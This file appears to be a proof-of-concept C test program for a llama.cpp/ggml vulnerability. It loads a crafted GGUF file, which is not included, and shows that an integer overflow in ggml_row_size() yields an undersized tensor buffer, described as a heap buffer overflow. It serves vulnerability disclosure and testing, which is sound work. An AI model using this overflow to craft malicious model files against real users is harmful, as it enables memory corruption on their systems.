llama-cpp-tensor-overflow-poc / test_tensor_overflow.c
salvepilo's picture
Upload test_tensor_overflow.c with huggingface_hub
fb05c3a verified
/*
* Test program to demonstrate integer overflow in tensor size calculation.
* Loads a malicious GGUF file and shows that ggml_nbytes() returns
* an incorrect (too small) value due to integer overflow in ggml_row_size().
*
* Compile:
* cc -o test_tensor_overflow test_tensor_overflow.c \
* -I ../llama.cpp/ggml/include -I ../llama.cpp/ggml/src \
* -L ../llama.cpp/build/bin -lggml-base -lggml \
* -Wl,-rpath,../llama.cpp/build/bin
*
* Run:
* ./test_tensor_overflow poc_tensor_overflow.gguf
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <inttypes.h>
#include "ggml.h"
#include "gguf.h"
int main(int argc, char **argv) {
if (argc < 2) {
fprintf(stderr, "Usage: %s <gguf_file>\n", argv[0]);
return 1;
}
const char *fname = argv[1];
printf("=== Tensor Integer Overflow PoC ===\n");
printf("Loading: %s\n\n", fname);
struct ggml_context *ctx = NULL;
struct gguf_init_params params = {
.no_alloc = true,
.ctx = &ctx,
};
struct gguf_context *gctx = gguf_init_from_file(fname, params);
if (!gctx) {
fprintf(stderr, "ERROR: gguf_init_from_file failed!\n");
return 1;
}
printf("[+] GGUF file loaded successfully (all validation passed!)\n\n");
int n_tensors = gguf_get_n_tensors(gctx);
printf("Number of tensors: %d\n\n", n_tensors);
// Iterate over tensors and show the overflow
struct ggml_tensor *tensor = ggml_get_first_tensor(ctx);
while (tensor) {
printf("Tensor: '%s'\n", tensor->name);
printf(" Type: %s (type_size=%zu, blck_size=%" PRId64 ")\n",
ggml_type_name(tensor->type),
ggml_type_size(tensor->type),
ggml_blck_size(tensor->type));
printf(" Dimensions: ne[0]=%" PRId64 ", ne[1]=%" PRId64
", ne[2]=%" PRId64 ", ne[3]=%" PRId64 "\n",
tensor->ne[0], tensor->ne[1], tensor->ne[2], tensor->ne[3]);
printf(" Strides: nb[0]=%zu, nb[1]=%zu, nb[2]=%zu, nb[3]=%zu\n",
tensor->nb[0], tensor->nb[1], tensor->nb[2], tensor->nb[3]);
size_t nbytes = ggml_nbytes(tensor);
int64_t nelements = ggml_nelements(tensor);
// Compute what the correct size should be
// For Q4_0: correct = type_size * nelements / blck_size = 18 * ne[0] / 32
size_t type_size = ggml_type_size(tensor->type);
int64_t blck_size = ggml_blck_size(tensor->type);
// Use Python-style big number arithmetic to show correct value
// correct_nbytes = nelements * type_size / blck_size
// But we can't compute this without overflow in C, so just show the values
printf(" ggml_nbytes(): %zu bytes\n", nbytes);
printf(" ggml_nelements(): %" PRId64 "\n", nelements);
printf(" ggml_row_size(): %zu bytes\n", ggml_row_size(tensor->type, tensor->ne[0]));
// Show the overflow
size_t row_size = ggml_row_size(tensor->type, tensor->ne[0]);
printf("\n === OVERFLOW DETECTION ===\n");
printf(" ggml_row_size = type_size * ne[0] / blck_size\n");
printf(" = %zu * %" PRId64 " / %" PRId64 "\n",
type_size, tensor->ne[0], blck_size);
printf(" Computed result: %zu bytes\n", row_size);
// Check for overflow: if type_size * ne[0] / blck_size != row_size
// then overflow occurred
// We can detect this by checking: row_size * blck_size / type_size != ne[0]
if (type_size > 0 && blck_size > 0) {
int64_t reconstructed = (int64_t)(row_size * blck_size / type_size);
if (reconstructed != tensor->ne[0]) {
printf(" *** INTEGER OVERFLOW DETECTED! ***\n");
printf(" Reconstructed ne[0] from row_size: %" PRId64 "\n", reconstructed);
printf(" Actual ne[0]: %" PRId64 "\n", tensor->ne[0]);
printf(" The buffer would be %zu bytes but tensor claims %" PRId64 " elements!\n",
nbytes, nelements);
printf(" This is a HEAP BUFFER OVERFLOW vulnerability!\n");
} else {
printf(" No overflow detected for this tensor.\n");
}
}
printf("\n");
tensor = ggml_get_next_tensor(ctx, tensor);
}
ggml_free(ctx);
gguf_free(gctx);
printf("[+] Test complete.\n");
return 0;
}